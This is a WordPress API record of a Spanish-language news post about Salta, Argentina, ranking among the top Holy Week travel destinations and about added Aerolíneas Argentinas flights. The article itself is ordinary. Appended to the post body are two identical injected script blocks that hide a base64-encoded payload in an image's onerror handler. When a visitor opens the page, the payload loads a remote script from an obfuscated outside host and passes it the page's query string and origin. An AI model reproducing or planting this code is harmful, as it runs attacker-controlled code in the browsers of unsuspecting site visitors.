{"id":2447,"date":"2023-04-03T09:02:40","date_gmt":"2023-04-03T12:02:40","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2447"},"modified":"2025-08-14T00:19:54","modified_gmt":"2025-08-14T03:19:54","slug":"salta-es-uno-de-los-principales-destinos-elegidos-en-plataformas-de-viajes","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2447","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/salta-es-uno-de-los-principales-destinos-elegidos-en-plataformas-de-viajes-88856\">Salta es uno de los principales destinos elegidos en plataformas de viajes<\/a>"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#083955\">Booking y Despegar mencionan a Salta entre las principales opciones elegidas para Semana Santa. Adem\u00e1s, Aerol\u00edneas anunci\u00f3 el incremento de frecuencias de rutas desde mercados estrat\u00e9gicos.<\/h4>\n\n\n\n<p>Semana Santa dentro del calendario tur\u00edstico es uno de los principales momentos del a\u00f1o para viajar, tomar un receso luego del inicio de clases y disfrutar en los destinos mejor posicionados del pa\u00eds. &nbsp;<\/p>\n\n\n\n<p>Uno de los principales puntos de venta son las plataformas online en las cuales Salta est\u00e1 entre las principales opciones del turista como lo remarca una investigaci\u00f3n publicada por el medio Perfil.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6471-salta-es-uno-de-los-destinos-mas-atractivos-por-su-variedad-de-paisajes.jpg\" alt=\"\" width=\"250\" height=\"167\"\/><\/figure><\/div>\n\n\n<p>Despegar indic\u00f3 que, hasta el momento, \u00ablos destinos m\u00e1s elegidos por los argentinos para los feriados que se avecinan son, a nivel nacional, Iguaz\u00fa, Bariloche, Mendoza, Salta y C\u00f3rdoba\u00bb. Por su parte, el top 3 de Booking en cuanto a la preferencia de los viajeros lo encabeza la ciudad de Buenos Aires, Mar del Plata y Salta.<\/p>\n\n\n\n<p><strong>M\u00e1s frecuencias<\/strong><\/p>\n\n\n\n<p>La conectividad es clave para el \u00e9xito de los fines de semana largos; en las \u00faltimas horas Aerol\u00edneas Argentinas inform\u00f3 que, en junio, la oferta de asientos se incrementar\u00e1 un 12% m\u00e1s respecto al mismo periodo de 2019. Anunci\u00f3 importantes incrementos de cara al segundo trimestre del a\u00f1o en varias de sus rutas dom\u00e9sticas.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-large is-resized\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6472-el-casco-historico-de-salta-maravilla-a-los-turistas-nacionales-e-internacionales.jpg\" alt=\"\" width=\"288\" height=\"192\"\/><\/figure><\/div>\n\n\n<p>La ruta Buenos Aires \u2013 Salta que en marzo operaba 40 frecuencias semanales pasa a 42 en abril, en mayo pasa a 48 frecuencias y luego en junio a 49. Adem\u00e1s, mantiene la cantidad de frecuencias del verano para las rutas con C\u00f3rdoba, Rosario, Neuqu\u00e9n e Iguaz\u00fa. De igual forma, se encuentra operando la ruta con San Pablo semanalmente.<\/p>\n\n\n\n<p>Salta espera Semana Santa con un calendario de m\u00e1s de 200 actividades, desde las tradicionales fiestas lit\u00fargicas, hasta experiencias tur\u00edsticas para todos los gustos en las regiones tur\u00edsticas. El calendario puede consultarse en\u00a0<a href=\"https:\/\/www.saltacalendario.gob.ar\/semana-santa\/\">https:\/\/www.saltacalendario.gob.ar\/semana-santa\/<\/a><\/p>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/salta-es-uno-de-los-principales-destinos-elegidos-en-plataformas-de-viajes-88856\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Booking y Despegar mencionan a Salta entre las principales opciones elegidas para Semana Santa. Adem\u00e1s, Aerol\u00edneas anunci\u00f3 el incremento de frecuencias de rutas desde mercados estrat\u00e9gicos. Semana Santa dentro del calendario tur\u00edstico es uno de los principales momentos del a\u00f1o para viajar, tomar un receso luego del inicio de clases y disfrutar en los destinos [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2448,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[21,18],"tags":[],"class_list":{"0":"post-2447","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacional","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2447"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2447"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2447\/revisions"}],"predecessor-version":[{"id":7127,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2447\/revisions\/7127"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2448"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2447"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2447"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2447"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}